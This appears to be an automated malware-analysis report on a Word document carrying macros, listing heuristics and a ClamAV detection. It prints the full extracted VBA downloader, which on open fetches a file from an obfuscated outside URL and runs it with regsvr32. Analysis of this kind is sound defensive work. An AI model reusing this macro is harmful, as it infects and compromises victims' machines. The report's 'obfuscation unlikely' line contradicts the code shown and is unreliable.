MALICIOUS
Risk Score: 298

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1071.001 Web Protocols
- T1059 Command and Scripting Interpreter
This OOXML document contains VBA macros, including an AutoOpen macro, which is a strong indicator of malicious intent. The script utilizes `CreateObject` and `URLDownloadToFile` to download and execute a second-stage payload from a remote location. The presence of these critical heuristics and the ClamAV detection strongly suggest a malicious document designed to deliver further malware.
Heuristics (8)

- ClamAV: Doc.Malware.Generic-7898874-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0.
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings). Document contains a VBA project; VBA macros present.
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOADURL). Matched line in script: `#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `' Convinces distilled functioning Set r = CreateObject("MSXML2.DOMDocument") Set sN = r.createElement("b64")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `End Enum Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `' Suet john imbibe b = Environ(FG) End Function`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml (referenced by macro)
  - http://schemas.microsoft.com/office/2006/relationships/vbaProject (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships/image (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationsh (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8105 bytes | a132fabbc751572acfe126d632cb5a211b198147abba55f49346462aef833be2 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "j"
Function jZ(HB)
' Moon
' Carried trite huge competing
' Forty-nine cud
' Asked contractor
' Decoy pleasurable maker
End Function
Function dS(my)
' Cf fisting
' Unconnected encore stations disquiet medline
' Continent rejoinder
' Closed shooting donor identifying triangular hilarious
' Goto instantaneous deutsch onslaught refuse european
' Detriment bracket dated marilyn
' Boxed calculators knife hops
' Uncanny mammoth stumps lauderdale confiscation
' Bawl exports subtle
' Convinces distilled functioning
Set r = CreateObject("MSXML2.DOMDocument")
Set sN = r.createElement("b64")
' Gets turquoise rating
' Forthcoming tvs
' Thoughts obdurate demolition
' Investigations alluring
' Village proximate
' Belize nicest cake hitch hit
' Obsequies special unscathed livestock
' Revert asbestos mid particles aggravation
' Programming autonomy borders siberia
With sN
.DataType = "bin.base64"
.Text = my
End With
' Stupefaction wakes libya
' Shoes
' Stat teaches guru potter caution
' Militant
dS = StrConv(sN.nodeTypedValue, 64)
' Acid pounce monaco jovial close walnut quebec
' Dais homeless family kirk
' Stolid false genealogy
' Segments separable overweening writs rem
End Function
Function F()
' Trinket guys tigress truculent transexuales lauderdale
' Citizens prattle
' Sweater stretcher fickle rancor
' Used cabin angola
' Fergus atheist
' Trumpeter
' Melissa
' Savage d ribbon casio sepulture
' Malevolence sophisticated charwoman reaching
' Fork
' Cv teeth lombard
' Crm
' Tulle
' Renewable transfiguration
' Hourly transmission
' Least
' Arthritis prostitution students thereat seduction
' Foreign dublin diet
' Aura
' Abler egypt
' Graduate
' Wearer sallow
' Realm scraped caution subversion
' Sport vaccination
' Inspiration processor marked fax
' Separable repeal bridges impiety mpg gzip
' Itself subterfuge texan musical
' Pedestrian
' Thereof drilling barbara savings
' Cashmere deuteronomy tahiti crisis
' Bite milieu orpheus circuit
' Troupe controls laundry stewed
' Subscriptions recipes
' Beavers saddles
End Function
Public Enum GY
' Mother-in-law domino redeem
' Blink afire carefully responsibility golden suave upload
' Deferential manor
' Absolutism sliced mohammedan pentium antediluvian
End Enum
Sub AutoOpen()
' Autocratic symphony
' Sec other
x1 = "tmp"
' Wheedle ar enable victor
' Ht voracious olivia
' Surgical beverly juvenile machines
' Lurid prelate
' Competency visitors vom twins
' Prefect tournament watson
' Break neapolitan professional
' Rugs sarah sluggish
Dim t7 As New y
' Demeter caracas
' Barnes torpedoes jaunt threats
' Skiing
' Resulting optional
' Paint sources
tv = t7.b(x1) & "\w." + x1
' Nationally
' Alder pump stanford
' Bacteria journalism
Dim arr(0 To 13)
arr(0) = Trim("~UnuthpUjBXkrsAZgh_B")
arr(1) = Trim("LlGRUtsDsduqmrfSdQUr")
arr(2) = Trim("GNm37szO18In7dzDZnw4")
arr(3) = Trim("_lerRJWYxonGIFmzpdUF")
arr(4) = Trim("sQGdQEjIWGqdI7e7-4kO")
arr(5) = Trim("URuTHt6JrTIQf0LcQ2Dk")
arr(6) = Trim("KccXV_AGjFbzAQ645QIB")
arr(7) = Trim("U6ephWplHv9_jCEN2Eaw")
arr(8) = Trim("O2ypixB2yACMwADM=x?p")
arr(9) = Trim("hp.O44fC3vMk9ygvZzQ_")
arr(10) = Trim("/egapnigol/snigulp/t")
arr(11) = Trim("netnoc-pw/erots.pohs")
arr(12) = Trim("2evol//:ptth")
' Hard-headed ne patio amalgamated biographical
' Thud final warwickshire gr grew
' Volga calabash
' Fair nat untruth heat genome
' Upturned thatll barrier challenging interference
' Connecticut nations
' Irascible
' Ist
' Tyrol dance responding
' Astral stipulation mediawiki scales dee
' For
' Saved trance legendary observatory pacify directed
' Flagrant engrave presentable state
' Polished
' Resolutions uninhabited anniversary salon
' Rhythm undercurrent acc tutorials
' Mosque migration
' Whether uh expansys inductive
t7.xp StrReverse(Join(arr, "")), tv
' Feudalism straightforward subversion greene vibrators
' Abdicate
' Ob recommends fifty-one wheelbarrow
' Forego beverages libation duties originally squint
' Confidentially
' Babel
' Ci truthfulness completes
' Better resulted
' Dumb instead
' Diplomat immunology
' Unfeigned braxton morrison bankruptcy collateral pore
Set B3 = t7.x(t7.d())
B3.Create t7.i() + " " + tv
' Lavishly checkout tried
' Shanghai declaration experiment careworn
' Notation proverbs
End Sub
Attribute VB_Name = "y"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
' Disreputable char erudite virginian certain
' Discuss reflections sharon
' Duration ministry postcards paypal calcareous
End Sub
Private Sub Class_Terminate()
' Mother-of-pearl saturn
' Twofold shove silurian columnists deposit
' Entail
' Flash freeze balkan interpose collective guitars
' Lifetime law-abiding did
End Sub
Public Function xp(q1, V5)
' Woodsman eng notices transmutation adapted
' Lawrence mineral horn
' Bothered
xy = URLDownloadToFile(0&, q1, V5, 0&, 0&)
End Function
Public Function b(FG)
' University cry
' Intensify deuteronomy contributor
' Dredge personnel philemon
' Suet john imbibe
b = Environ(FG)
End Function
Public Sub o(V5)
' Somerset
' Cradle magpie crestfallen indelible isa conferences
' Specifics
' Jan plume recede pf
' Magnolia fallible cosmic charging
' Pledge flashlight harold entities
' Feline finishing illegally pent-up polls marlowe
' Forensic fader gary displease ie
' Subject-matter cuneiform aa drums invective northeast
' Midsummer bowl allay
End Sub
Function x(XV)
' Lull untidy itinerant rf frozen
' Our coasting watches insurgent wicket
' Political synthesis parliament
' Grounded toyota funding horse
' Intake moderate
' Pelvis gamma hobart delinquent interrogation
Set x = VBA.CreateObject(XV)
End Function
Public Function i()
' Wafer grows
' Vitiated certificates
' Particle competent del transgressor
' Decorative gangway paraphrase biographer
' Passively philology
' Intestine
' Diy refused
' Eliminated pedigree gentleman nome tribunal
' Squad storied unopened passers-by
' Tions confessor reiterate oral
' Garmin publishing maryland
i = dS(StrReverse("=IzMyZ3cnVmc"))
End Function
Public Function d()
' Generate
' Induction overbearing route shows windmill
' Sixth caused mercurial miles smudge
' Mildew props probabilities
' Poetry solstice guts
' Yourself idiocy epirus dear
' Bakery incorporeal administration
' Opprobrium
' Guard flinching sleep complement dan
' Ambient tries
' Hose km hypnotism
d = StrReverse(dS("c3NlY29yUF8yM25pVzpzdG1nbW5pdw=="))
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{7637D207-6D87-492A-8056-D3C3965BF4D6}{64AA69FE-FF11-42FD-97E3-47456F694C01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes | 14ce5d88eef0cef92ce3a14c91ae10f710c37d52edc065fac0fb6e7b5007d39e |

Detection

- ClamAV: Doc.Malware.Generic-7898874-0
- Obfuscation or payload: unlikely